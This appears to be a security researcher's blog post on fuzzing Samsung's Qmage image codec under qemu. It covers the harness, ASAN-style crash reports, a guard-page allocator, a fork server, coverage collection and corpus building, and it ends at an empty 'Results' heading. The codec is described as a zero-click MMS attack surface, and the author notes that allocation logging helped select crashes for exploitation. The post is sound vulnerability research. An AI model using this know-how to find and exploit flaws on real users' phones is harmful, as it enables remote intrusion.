In Part 1, I discussed how I discovered the "Qmage" image format natively supported on all modern Samsung phones, and how I traced its roots to Android boot animations and even some pre-Android phones. At this stage of the story, we also know that the codec seems very fragile and is likely affected by bugs, and that it constitutes a zero-click remote attack surface via MMS and the default Samsung Messages app. I was at this point of the project in early December 2019. The next logical step was to thoroughly fuzz it – the code was definitely too extensive and complex to approach with a manual audit, especially without access to the original source or expertise of the inner workings of the format. As a big fan of fuzzing, I hoped to be able to run it in accordance with the current state of the art: efficiently (without unnecessary overhead), at scale, with code coverage information, reliable reproducibility and effective deduplication. But how to achieve all this with a codec that is part of Android, accessible only through Skia image API, and precompiled for the ARM/ARM64 architectures only? Read on to find out!

Writing the test harness
The fuzzing harness is usually one of the most critical pieces of a successful fuzzing session, and it was the first thing I started working on. I published the end result of my work as SkCodecFuzzer on GitHub, and it can be used as a reference while reading this post. My initial goal with the loader was to write a Linux command-line program that could run on physical Android devices, and use the Skia SkCodec interface to load and decode an input image file in exactly the same way (or at least as closely as possible) as the internal Android doDecode function does it. This turned out to be surprisingly easy: if we ignore some largely irrelevant portions of doDecode, such as interactions with the JNI (Java Native Interface), NinePatch related code and scaling, we are left with just a handful of simple method calls.
Accordingly, the ProcessImage() function in my harness is less than 100 lines of code. In order to build such an initial version of the loader, I used the Android NDK toolset, included several header files from the Skia source code, and linked it with the library from the target operating system. After copying the executable and an example Qmage file (let's stick with accessibility_light_easy_off.qmg from Part 1) to my test phone, I could test that it worked:
d2s:/data/local/tmp $ ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
d2s:/data/local/tmp $
It's worth noting that the harness I used for my fuzzing had one extra check, verifying that the input file started with a QM or QG signature. This was necessary to make sure that the coverage-guided fuzzing wouldn't diverge towards other image formats supported by Skia, and only Qmage-related code would remain tested. There is also a slight difference between Android's code and my harness in the specific heap allocation class used (SkBitmap::HeapAllocator vs a selection of possible classes), but that shouldn't matter in any practical way.
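The signature check mentioned above takes only a few lines. The following is a minimal sketch rather than the code from SkCodecFuzzer; the function name `has_qmage_signature` is an assumption made for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if the buffer begins with the two-byte "QM" or "QG" signature,
 * 0 otherwise (including buffers too short to hold a signature). */
static int has_qmage_signature(const uint8_t *data, size_t size) {
    if (data == NULL || size < 2)
        return 0;
    return data[0] == 'Q' && (data[1] == 'M' || data[1] == 'G');
}
```

Rejecting every other input before it reaches the decoder keeps a coverage-guided fuzzer from being rewarded for mutating a sample into, say, a PNG.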
Having such a loader run on Android is great, but it doesn't scale very well and my fuzzing tooling is much better on x86 too, so I was very tempted to get it running on the Intel architecture. One solution would be to try and run the same aarch64 ELF in an emulator such as qemu-aarch64. To make this work, we have to make sure that all potential dependencies of the harness are accessible on the host's file system, by pulling the full /system/lib64 directory, the /system/bin/linker64 file, and perhaps further directories such as /apex/ from the research phone to our PC. Once we have that, we can try executing the loader under qemu:
j00ru@j00ru:~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 qemu-aarch64 ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
j00ru@j00ru:~/SkCodecFuzzer/source$
If $ANDROID_PATH above points to a directory with Android 9 system files, it works! This is great news as it means that there aren't any fundamental blockers to running emulated Android user-mode components on a x86-64 host. With Android 10 system files, there was one minor issue with an abort thrown by
==31162==Sanitizer CHECK failed: /usr/local/google/buildbot/src/android/llvm-toolchain/toolchain/compiler-rt/lib/sanitizer_common/ ((internal_prctl(0x53564d41, 0, addr, size, (uptr)name) == 0)) != (0) (0, 0)
libc: Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 31162 (qemu-aarch64), pid 31162 (qemu-aarch64)
By looking at the underlying code, it would seem that an UBSAN_OPTIONS=decorate_proc_maps=0 environment variable should fix the problem, but it didn't, and I didn't investigate further. Instead, I swapped the library with its older copy from Android 9, and the harness correctly worked again.
So, we can now run the Qmage codec on a typical Intel workstation, but one question remains – what is the performance? Software emulation such as qemu's is known to introduce visible overhead as compared to native execution speed. Let's quickly compare the run time of the loader on a Samsung device and in qemu, against the accessibility_light_easy_off.qmg sample:
d2s:/data/local/tmp $ time ./loader accessibility_light_easy_off.qmg >/dev/null
    0m00.12s real     0m00.09s user     0m00.03s system
d2s:/data/local/tmp $

j00ru@j00ru:~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 time qemu-aarch64 ./loader -d -i accessibility_light_easy_off.qmg >/dev/null
real  0m0.380s
user  0m0.355s
sys   0m0.025s
j00ru@j00ru:~/SkCodecFuzzer/source$
Based on this simple test, there seems to be a ~3x slowdown when running in the emulator. This is not great but completely acceptable, especially if we can scale it up to numerous machines, and maybe find some further optimizations along the way.
At this point, we have a very basic harness that just decodes an input image using the same Skia interfaces as Android. Let's see how we can make it better fit for fuzzing.

Improvement #1 – custom ASAN-like crash reports
One problem with the loader running under qemu is how crashes are manifested by default:
libc: Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4089bfc000 in tid 929264 (qemu-aarch64), pid 929264 (qemu-aarch64)
A native SIGSEGV signal is generated in the emulator and caught by the default libc handler. Let's try this again with gdb attached to see where the exception is thrown:
─────────────────────────────────────────────────────────────── code:x86:64
   0x555555fce3ed <code_gen_buffer+7496640> lea    r14, [rbx+0x1]
   0x555555fce3f1 <code_gen_buffer+7496644> shl    r14, 0x8
   0x555555fce3f5 <code_gen_buffer+7496648> sar    r14, 0x8
 → 0x555555fce3f9 <code_gen_buffer+7496652> movzx  r14d, BYTE PTR [r14]
   0x555555fce3fd <code_gen_buffer+7496656> add    rbx, 0x2
   0x555555fce401 <code_gen_buffer+7496660> mov    QWORD PTR [rbp+0xa8], rbx
   0x555555fce408 <code_gen_buffer+7496667> and    r12d, 0xffffff
   0x555555fce40f <code_gen_buffer+7496674> mov    rbx, r12
   0x555555fce412 <code_gen_buffer+7496677> shl    rbx, 0x8
───────────────────────────────────────────────────────────────────── trace
[#0] 0x555555fce3f9 → code_gen_buffer()
[#1] 0x55555563c720 → cpu_exec()
[#2] 0x55555566e528 → cpu_loop()
[#3] 0x5555555f94cd → main()
As we can see, the x86-64 instruction triggering the crash resides in qemu's code generation buffer, and it's hard to trace it to the actual culprit in ARM assembly inside The native call stack isn't of much help either, as it only shows the qemu internal functions and not the stack frames of the emulated code. Because of all this, working with these raw crashes is incredibly difficult – they are hard to analyze, triage or deduplicate without re-running them on an Android device. There had to be another way to extract accurate information about the emulated ARM CPU context at the time of the crash.
The internal Google fuzzing infrastructure I use for projects like this supports both native crashes (signals) and AddressSanitizer reports. Most importantly, these reports don't have to be 100% identical to legitimate ASAN outputs. They only have to be close enough to be correctly parsed, but they can still contain both fake data (if the specific information is not available in the given context), and some extra sections you don't normally see in ASAN-enabled targets. I have already taken advantage of this behavior a few times in the past, for example in the DrSancov project I published, which aims to convert any closed-source Linux x86(-64) executable into a semi-ASAN/SanitizerCoverage compatible one using the DynamoRIO instrumentation framework. This was my idea here too – if I could register my own signal handler in the harness, it could print out all the relevant context that it has access to within the emulated process, effectively faking an ASAN crash.
The end result is the GeneralSignalHandler function and other unwinding and symbol-related helper routines, which are able to generate pretty crash reports such as the following one:
ASAN:SIGSEGV
=================================================================
==936966==ERROR: AddressSanitizer: SEGV on unknown address 0x408a0e1000 (pc 0x4006605174 sp 0x4000d0adc0 bp 0x4000d0adc0 T0)
    #0 0x002bd174 in (PVcodecDecoder_GrayScale_16bits_NEW+0x2290)
    #1 0x0029cf00 in (__QM_WCodec_decode+0x3b8)
    #2 0x0029c9b4 in (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
    #4 0x006e1ef0 in (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+0x450)
    #5 0x004daf00 in (SkCodec::getPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const*)+0x358)
    #6 0x006e278c in (SkQmgAdapterCodec::onGetAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const&)+0xac)
    #7 0x004da498 in (SkAndroidCodec::getAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const*)+0x2b0)
    #8 0x0004a9a0 in loader (ProcessImage()+0x55c)
    #9 0x0004ac60 in loader (main+0x6c)
    #10 0x0007e858 in (__libc_init+0x70)

==936966==DISASSEMBLY
    0x4006605174: ldrb        w9, [x13, #1]
    0x4006605178: add         x13, x13, #2
    0x400660517c: bfi         w9, w2, #8, #0x18
    0x4006605180: stur        w9, [x29, #-0xf8]
    0x4006605184: ldur        w19, [x29, #-0xf4]
    0x4006605188: cbz         x8, #0x40066051fc
    0x400660518c: b           #0x4006605250
    0x4006605190: ldr         x9, [sp, #0x110]
    0x4006605194: orr         w27, wzr, #7
    0x4006605198: ldrb        w4, [x9, #1]!

==936966==CONTEXT
   x0=fffffffffffffaa8  x1=0000000000000558  x2=0000000000000000  x3=0000000000000014
   x4=0000004089d33670  x5=0000000000000003  x6=0000000000000003  x7=0000000000000011
   x8=0000000000000004  x9=0000000000000000 x10=0000000000000004 x11=000000408a0e2f8f
  x12=0000000000000000 x13=000000408a0e0fff x14=000000408a0deffc x15=000000000000001f
  x16=0000000000000018 x17=0000000000000000 x18=00000040013f4000 x19=000000000000005b
  x20=0000000000007000 x21=000000408a0c6f55 x22=000000408a0c4eaa x23=0000000000000000
  x24=0000000095100000 x25=000000408a0e0764 x26=0000000000000005 x27=0000000000000007
  x28=0000000000000128  FP=0000004000d0b020  LR=0000004089d338c0  SP=0000004000d0adc0
The first section of the report is essential for automation, as it includes the type of the signal and stack trace used for deduplication. The disassembly and register values are supplementary and mostly useful in triage, to quickly determine what kind of crash we are dealing with.
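To illustrate how little is needed to imitate the first line of such a report, here is a minimal sketch that formats the header into a buffer. It is not the GeneralSignalHandler code. The function name `format_asan_header` is hypothetical, and a real signal handler would need more care, since `snprintf` is not async-signal-safe.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Formats an ASAN-style SEGV header line into `buf`.
 * Returns the value returned by snprintf. */
static int format_asan_header(char *buf, size_t size, int pid, uint64_t addr,
                              uint64_t pc, uint64_t sp, uint64_t bp) {
    return snprintf(buf, size,
                    "==%d==ERROR: AddressSanitizer: SEGV on unknown address "
                    "0x%" PRIx64 " (pc 0x%" PRIx64 " sp 0x%" PRIx64
                    " bp 0x%" PRIx64 " T0)",
                    pid, addr, pc, sp, bp);
}
```

Fed with the values from the report above, the function reproduces its header line character for character, which is all a report parser needs in order to treat the crash as an ASAN one.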
The extra functionality comes at the cost of slightly more difficult compilation, as Capstone and libbacktrace need to have their headers included, and static/shared objects linked into the loader. Fortunately this didn't turn out to be too hard, as outlined in SkCodecFuzzer's README. If you run into any issues during the building process with SkCodecFuzzer, please refer to the Issues section as several related problems have been resolved there.
In its current shape, the signal handler also includes a few interesting workarounds for problems I didn't originally anticipate and only stumbled upon during development and testing:
  • On Android 10, executable code sections (.text etc.) are marked as Execute Only and are thus non-readable (--x access rights). This caused the signal handler to fail when running on a physical Android device, as Capstone would trigger a nested crash while trying to read the instruction bytes for disassembly. I fixed this with an mprotect call to make the memory readable.
  • If the stack is corrupted (e.g. due to a buffer overflow), the stack unwinding code may crash on invalid memory access. Such "double faults" need to be gracefully handled so that the full crash report is always generated correctly. I fixed this with the DoubleFaultHandler and the globals::in_stack_unwinding flag.
  • The abort libc function (called e.g. by __stack_chk_fail) disables the delivery of all signals other than SIGABRT, making it impossible to catch nested exceptions in the stack unwinder. I fixed this with a sigprocmask call.
  • Crashes occurring at different offsets within standard memory manipulation functions (memcpy, memmove, memset) were wrongly classified as unique, bloating the results and skewing the numbers. I fixed this by detecting these special functions and using their entrypoint addresses in the stack trace, instead of the precise addresses of the faulting instructions.
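The last workaround in the list can be sketched as a small normalization step applied to a stack frame before it is used for deduplication. The `struct frame` layout and the function names below are assumptions for illustration and are not taken from SkCodecFuzzer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical frame record produced by a symbolizer. */
struct frame {
    const char *symbol; /* resolved function name, or NULL if unknown */
    uint64_t entry;     /* address of the function's first instruction */
    uint64_t pc;        /* precise address inside the function */
};

/* Returns 1 for the generic memory manipulation routines named in the text. */
static int is_mem_function(const char *symbol) {
    static const char *const names[] = {"memcpy", "memmove", "memset"};
    if (symbol == NULL)
        return 0;
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++)
        if (strcmp(symbol, names[i]) == 0)
            return 1;
    return 0;
}

/* Address to use for deduplication: the entry point for memory functions,
 * the precise program counter for everything else. */
static uint64_t dedup_address(const struct frame *f) {
    return is_mem_function(f->symbol) ? f->entry : f->pc;
}
```

Two crashes at different offsets inside memcpy then collapse into the same stack trace entry, while crashes in codec functions keep their exact addresses.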
Improvement #2 – custom low-level allocator (libdislocator)
The custom signal handler is a very useful feature for inspecting and deduplicating crashes, but it helps the most coupled with effective detection of memory safety violations. On Android 9 and 10, Skia uses the default system allocator (jemalloc), which is optimized for performance and not fuzzing. As a result, many tiny out-of-bounds memory accesses may not be detectable at all, as they will just silently fall into the adjacent allocation without corrupting any critical data. In other cases, some bugs may overwrite different adjacent chunks in different test runs due to a non-deterministic heap state, leading to exceptions being thrown further down the line at different locations of the library. All in all, using the default allocator in fuzzing is almost guaranteed to conceal some bugs, and obscure the real root cause of others.
The solution to this problem is to use allocators specialized for fuzzing, which typically incur a significant memory overhead, but can provide very precise detection of memory bugs at the very moment when they happen. On Windows, examples of such allocators are PageHeap in user-mode and Special Pool in the kernel. On Linux, for closed-source software, there is Electric Fence and of course projects like valgrind for improved bug detection, but my favorite tool for the job is AFL's libdislocator. It is a super lightweight (<300 lines) module that simply implements malloc and free as mmap and mprotect, placing each returned chunk precisely at the end of a mapped memory page. It is easily adjustable, works on x86/ARM, and can be used either as a preloaded .so library or linked statically into the harness.
In my case, I linked it in statically and redirected allocator calls to it via the malloc_hook mechanism. On Android, enabling these hooks requires setting the LIBC_HOOKS_ENABLE environment variable, which lets us easily switch between libdislocator and jemalloc when needed. Thanks to being able to intercept the heap allocator interface, I could also implement the --log_malloc flag, to log all allocs and frees taking place in the process at runtime. This option proved invaluable to me later during exploit development, as it allowed me to better understand the allocation patterns and identify the crashes most suitable for exploitation.
The entire fuzzing session ran with libdislocator enabled, and I believe that all identified crashes manifested real bugs in the code. At the same time, it is important to note that there are some differences between the custom and default system allocator, which may influence how easy it is to reproduce a libdislocator crash with jemalloc (also detailed in my original bug report in section "3.3. Libdislocator vs libc malloc"):
  • There is a hard 1 GB allocation limit enforced by libdislocator, which makes it easier to surface bugs related to memory pressure, but may also mask issues that require large allocations to succeed first.
  • libdislocator doesn't adhere to the same allocation alignment rules as jemalloc, meaning that it may return completely misaligned pointers (side note: it is therefore incompatible with software that uses the low pointer bits for tags). This may hide some small out-of-bounds memory accesses (1-7 bytes) on Android, if they happen to fall into the padding area. It's worth noting that the misalignment occurs only in qemu, which doesn't seem to enforce the address alignment requirement on atomic instructions such as LDXR. On Android itself, the harness does correctly align the chunks too, in order to prevent bogus SIGBUS signals being thrown.
  • libdislocator fills all new allocations with a 0xCC marker byte to improve detection of use of uninitialized memory. With jemalloc, the contents of each allocated chunk are not guaranteed to have any particular value. Controlling the bytes of a specific fresh allocation may be non-trivial or require the use of "heap massaging" techniques in practical attack scenarios.
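The core idea of such an allocator (a chunk ending exactly at a page boundary, followed by an inaccessible guard page, and filled with a marker byte) can be sketched as follows. This is a simplified illustration and not libdislocator's actual code. The name `guarded_alloc` is hypothetical, the matching free routine is omitted, and no overflow checks are made on `size`.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE /* exposes MAP_ANONYMOUS on glibc */
#endif
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Allocates `size` bytes so that the byte right after the chunk lies in a
 * PROT_NONE guard page. Returns NULL on failure. */
static void *guarded_alloc(size_t size) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t data_len = (size + page - 1) / page * page; /* round up to pages */

    uint8_t *base = mmap(NULL, data_len + page, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;

    /* Make the trailing page inaccessible so any overflow faults at once. */
    if (mprotect(base + data_len, page, PROT_NONE) != 0) {
        munmap(base, data_len + page);
        return NULL;
    }

    uint8_t *chunk = base + data_len - size; /* chunk ends at the guard page */
    memset(chunk, 0xCC, size);               /* marker for uninitialized use */
    return chunk;
}
```

Because the chunk is aligned to its end rather than its start, the returned pointer is generally not aligned, which matches the alignment caveat in the list above.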

With the custom allocator covered, we have arrived at the current form of the SkCodecFuzzer harness. It is time to look beyond it and see how we can achieve even more at the level of the qemu emulator.

Implementing a Qemu fork server
Earlier in the post, I showed how decoding a sample Qmage file with our loader under qemu takes around 380ms. This raises a question: how much of that is the qemu start-up time, and is there any room for optimization here? We can run a simple test and measure the run time of the loader without any arguments:
Error: missing required --input (-i) option
Usage: [LIBC_HOOKS_ENABLE=1] ./loader [OPTION]...
Required arguments:[...]
real  0m0.360s
user  0m0.336s
sys   0m0.024s
j00ru@j00ru:~/SkCodecFuzzer/source$
It turns out that simply printing out some help and immediately exiting takes 95% of the time it takes to decode a bitmap, indicating that there is a large constant cost of starting the process, which we can try to eliminate or at least significantly reduce. There is a well-known solution to this problem called a fork server, and the internal Google fuzzing infrastructure supports it, including the ability to resume execution from a user-defined forkserver_main function.
Of course in this case, enabling the fork server is not as easy as flipping a configuration flag, because that would only accelerate the qemu process startup time (already quite short at 10ms). However, the bulk of the overhead (~350ms in our testing so far) comes from bootstrapping the emulated environment before the target main function is reached:

Therefore, we have to get the fork server to fork inside qemu at the point when the emulation reaches the "loader" program entrypoint (at the border of the yellow and green sections). Fortunately, we don't have to figure it all out on our own, as AFL already supports such a mechanism. To make it work with qemu-4.1.1 (the version I was using), I had to modify the code in two places:
  1. In the load_elf_image function in linux-user/elfload.c, to find the entry point of the loader executable, similarly to how afl_entry_point is initialized in AFL's patch.
  2. In the cpu_tb_exec function in accel/tcg/cpu-exec.c, to detect when the emulation has reached the entry point and to call into the special forkserver_main routine to activate the fork server, similarly to how the AFL_QEMU_CPU_SNIPPET2 macro executes in AFL's patch.
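The fork server principle itself is independent of qemu: pay the expensive initialization once in the parent, then fork a fresh child for every test case. The sketch below shows only that principle. It is not the AFL or qemu patch, and `run_in_child` and `demo_target` are hypothetical names.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs one test case in a forked child and returns its exit code.
 * Returns -1 if fork/waitpid fails or the child died abnormally
 * (for example, it was killed by a signal). */
static int run_in_child(int (*target)(void)) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(target()); /* child: inherits the initialized state, runs once */

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Stand-in for "decode one input file"; purely illustrative. */
static int demo_target(void) {
    return 7;
}
```

A real fork server would call something like `run_in_child` in a loop, once per input supplied by the fuzzer, so the bootstrap cost before the fork point is paid only once.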

These two relatively simple modifications were sufficient to cause a dramatic boost of fuzzing performance. Let's look at the numbers from the servers I actually ran the fuzzing on. They're a bit slower than my workstation, so without the fork server, the loader takes on average 1160ms to decode a sample from my corpus. With the fork server, this is reduced to 56ms, which makes it a ~20.5x speed up! And it gets even better when we enable the code coverage collection (discussed in the next section) and specify the -d nochain command line flag: in that setting, the average decoding times grow to 6900ms (without fork server) and 147ms (with fork server) respectively, which further widens the gap between them to a factor of ~47x. In fuzzing, the importance of such small yet crucial optimization tricks simply cannot be overstated.

Extracting code coverage – introducing QemuSanitizerCoverage
Another hugely important part of automated software testing is collecting and acting on the code coverage triggered by mutated samples. The fuzzer that I used supports reading .sancov coverage information files generated by the SanitizerCoverage instrumentation. Since the harness already pretends to be an ASAN-enabled target, why not become a SanCov-compatible one too? This is exactly the purpose of the DrSancov project, but it is based on DynamoRIO and thus can only be used with software compatible with the host CPU architecture. So, I had to "port" DrSancov to qemu, creating a mod dubbed QemuSanitizerCoverage.
I began working on the port by looking for a location in the code where the information about each executed basic block passed through. I quickly found the -d exec option (and this helpful blog post), which could be used to print out the kind of data I was interested in, but in textual form. I traced it back to the following snippet:
    qemu_log_mask_and_addr(CPU_LOG_EXEC, itb->pc,
                           "Trace %d: %p ["
                           TARGET_FMT_lx "/" TARGET_FMT_lx "/%#x] %s\n",
                           cpu->cpu_index, itb->tc.ptr,
                           itb->cs_base, itb->pc, itb->flags,
                           lookup_symbol(itb->pc));
The above code resides in the familiar cpu_tb_exec function in accel/tcg/cpu-exec.c, which I had already modified to enable the fork server. In here, I only had to add a simple call to my sancov_log_trace() callback, passing itb->pc as the only argument. The actual work happens in the callback itself: if the instruction address resides in a known library, the corresponding cell in its coverage bitmap is marked as visited; if not, the /proc/pid/maps file is parsed to find the shared object or executable. Then, right before qemu exits, the collected coverage is dumped to disk. This is how it looks in practice:
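The bookkeeping done by such a callback can be sketched as a per-module bitmap. This is not the QemuSanitizerCoverage source: the `struct module_cov` layout, the function names, and the choice of one bit per 4-byte AArch64 instruction slot are all assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical coverage record for one loaded module. The caller provides
 * a zeroed bitmap with at least one bit per 4-byte instruction slot. */
struct module_cov {
    uint64_t base;   /* load address of the module */
    uint64_t size;   /* size of the mapping in bytes */
    uint8_t *bitmap; /* one bit per instruction slot */
};

/* Marks `pc` as visited. Returns 1 if it belongs to the module, else 0. */
static int cov_mark(struct module_cov *m, uint64_t pc) {
    if (pc < m->base || pc - m->base >= m->size)
        return 0; /* unknown address: the caller would look up another module */
    uint64_t slot = (pc - m->base) / 4; /* AArch64 instructions are 4 bytes */
    m->bitmap[slot / 8] |= (uint8_t)(1u << (slot % 8));
    return 1;
}

/* Counts distinct visited slots, i.e. the number of PCs to be written out. */
static size_t cov_count(const struct module_cov *m) {
    size_t n = 0;
    for (uint64_t slot = 0; slot < (m->size + 3) / 4; slot++)
        if (m->bitmap[slot / 8] & (1u << (slot % 8)))
            n++;
    return n;
}
```

Marking the same address twice leaves the count unchanged, which is why the final numbers describe unique basic blocks rather than executed ones.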
$ ASAN_OPTIONS=coverage=1 LD_LIBRARY_PATH=`pwd`/lib64 ./qemu-aarch64 -d nochain ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
QemuSanitizerCoverage: ./ 1502 PCs written
QemuSanitizerCoverage: ./ 333 PCs written
$
We get an output message similar to the one typically printed by SanitizerCoverage, which informs us that the processing of the sample Qmage file involved 1502 unique basic blocks in We can take a peek at the coverage data:
$ xxd -e -g 4 | head -n 5
00000000: ffffff32 c0bfffff 00000d38 000010a4  2.......8.......
00000010: 000010ac 000010b0 000010b4 000010b8  ................
00000020: 000010c4 000010d8 000010e0 000011a4  ................
00000030: 000011a8 000011c0 000011cc 00001204  ................
00000040: 0006fa94 0006fac4 0006fad0 0006fadc  ................
$
There is an 8-byte header indicating the 32-bit format, followed by offsets of basic blocks relative to the start of the .text section in We can convert the file to a format supported e.g. by Lighthouse and visualize the coverage or use the information directly to maintain an optimal corpus throughout the fuzzing session:
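The layout described above (an 8-byte magic value followed by 32-bit offsets) is simple enough to parse by hand. The sketch below assumes the little-endian encoding visible in the dump. The function names are hypothetical, and no SanitizerCoverage library code is used.

```c
#include <stddef.h>
#include <stdint.h>

/* Reads a little-endian 32-bit value regardless of host endianness. */
static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Validates the header of a 32-bit .sancov blob and returns the number of
 * offsets stored after it, or -1 if the blob is malformed. */
static long sancov32_count(const uint8_t *buf, size_t len) {
    if (len < 8 || (len - 8) % 4 != 0)
        return -1;
    /* The magic as it appears in the dump: ffffff32 c0bfffff. */
    if (read_le32(buf) != 0xffffff32u || read_le32(buf + 4) != 0xc0bfffffu)
        return -1;
    return (long)((len - 8) / 4);
}

/* Returns the index-th basic block offset; the caller checks the bounds. */
static uint32_t sancov32_offset(const uint8_t *buf, size_t index) {
    return read_le32(buf + 8 + 4 * index);
}
```

Applied to the first 16 bytes of the dump, this yields two offsets, 0xd38 and 0x10a4.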

The benefits of having insight into the code coverage of a fuzzing target are well known, but I will emphasize that this feature played a key role in this project. It helped me fill in any gaps in my original input corpus, and get some degree of confidence that this highly extensive codec was tested thoroughly.

Initial file corpus
In my preparation for the first fuzzing attempt of the codec from Samsung Galaxy A50 (Android 9), there were three formats that I needed to find for my corpus: QMv1, QG1.0 and QG1.1. I was able to locate and extract a number of test cases encoded in each of them from the resources of built-in APKs in various Samsung firmwares from the 2014-2016 period, which I deemed sufficient to get myself started. Once I collected the initial data set, I ran a number of test fuzzing sessions during which the corpus continuously evolved thanks to the code coverage feedback. After a few days, it looked nothing like the original set of files: new samples were added, and most initial files were either removed or significantly mutated in the process. I was especially happy to see that a great majority of the files in the resulting corpus were minimized down to 20-50 bytes, which I attribute to the corpus management algorithm which favors shorter samples over longer ones (as described in my BH EU 2016 talk, slides 49-70).
When I learned about the existence of the new QG2.0 format in Android 10, I immediately went looking for such bitmaps in the usual place – embedded APK resources. To my surprise, I didn't find any images encoded in the new format then, and I still haven't seen any such files "in the wild" to date. This meant that I had to improvise. One of my attempts to create samples resembling the QG2.0 format was to take the existing ones in my corpus and hardcode the version in their headers to 2.0. This didn't work out very well as most such files were immediately crashing the codec (instead of hitting some deeper code paths), and I was left with only a few dozen artificial QG2.0 samples that probably didn't have very good coverage. I decided to leave the rest to the fuzzer and hope that over time, it would manage to synthesize much more interesting inputs in the new format.
I was not disappointed. Based on my measurements, after several days of fuzzing, the coverage of the QG2.0-related code paths was comparably good to the coverage of the three older formats. I will go into more detail on the numbers in a later section, but I think it is interesting to note that my December 2019 fuzzing session of the ≤ QG1.1 formats touched 18268 basic blocks in, while my January 2020 session of all ≤ QG2.0 formats had a coverage of 29081 blocks in the same library (and the coverage rate relative to the size of the Qmage codec was similar in both cases, at ~90%). This is a 59% increase, and it goes to show the extent of extra complexity added by Samsung in Android 10. It also seems in line with the size of the Qmage-related code in (mentioned in Part 1), which was 425 kB in Android 9, and 908 kB in Android 10.
As a last thought, I find it amusing how the fuzzer managed to reach the QG2.0 code paths, considering that this latest format introduces a one-byte checksum, which is verified against the file length in QmageDecCommon_ParseHeader:
if (input_data[header_size - 1] != xored_bytes_of_file_length) {
  __android_log_print(ANDROID_LOG_ERROR, "QG",
                      "QmageDecCommon_ParseHeader : checksum is different!");
  return -2;
}
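One plausible reading of xored_bytes_of_file_length is the XOR of the individual bytes of the file length. The sketch below assumes that reading and a 32-bit length; both are assumptions, although they agree with the post's own example of a 257-byte file producing a 0x00 checksum. The function name is hypothetical.

```c
#include <stdint.h>

/* XORs together the four bytes of a 32-bit file length. */
static uint8_t xor_bytes_of_length(uint32_t length) {
    return (uint8_t)((length ^ (length >> 8) ^ (length >> 16) ^
                      (length >> 24)) & 0xff);
}
```

For a length of 257 (0x0101) the two non-zero bytes cancel out, so a file of that size passes the check whenever the last header byte is zero.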
Even with this minor obstruction, the fuzzer managed to produce some samples that passed the check (most notably with a length of 257 bytes, which resolves to a 0x00 checksum). At the same time, the post-fuzzing corpus also contained plenty of QG1.2 files, which had me wondering for a long time, because I knew it for a fact that this version didn't exist. When I finally decided to analyze this odd behavior, everything became clear. We have already discussed in Part 1 that the version check in QmageDecCommon_VersionCheck is very permissive and it allows anything ≤ 2.0, so 1.2 passes just fine. But why this specific version? In the SkQmgCodec class, there is a field that denotes the version of the image: 0 for 1.0, 1 for 1.1 and 2 for 2.0. The way it used to be initialized (it seems to be fixed now) was as follows:
  • If version == 2.0, then internal_version = 2
  • Else if version == X.Y, then internal_version = Y
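The two rules translate directly into code. This is a sketch of the logic as described, not decompiled code from SkQmgCodec, and the function name is hypothetical.

```c
/* Maps a file version "major.minor" to the internal version field,
 * following the two rules listed above (the old, permissive behavior). */
static int internal_version(int major, int minor) {
    if (major == 2 && minor == 0)
        return 2;
    return minor; /* only the minor component is consulted otherwise */
}
```

Versions 1.0 and 1.1 map to 0 and 1 as intended, but the non-existent version 1.2 maps to 2 as well.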

So according to this logic, QG1.2 files were equivalent to QG2.0 for all intents and purposes, except that they were easier to synthesize due to the lack of checksum verification, which is the reason so many of them wound up in my fuzzer's dynamic corpus. I probably wouldn't have come up with it myself given the non-trivial data flow in the header parsing, and it never ceases to amaze me how basic mutations paired with a coverage feedback loop can lead to such unexpected and clever results.

Mutation settings
The mutation settings I used for the fuzzing were very simple and involved five algorithms: flipping bits, randomly changing bytes, inserting "special" integers, performing arithmetic operations on the data, and cutting+pasting random continuous chunks across the input data stream. I also chained pairs of these mutators together, and occasionally invoked Radamsa. The mutation ratios ranged from 0% to 0.1%.

Results
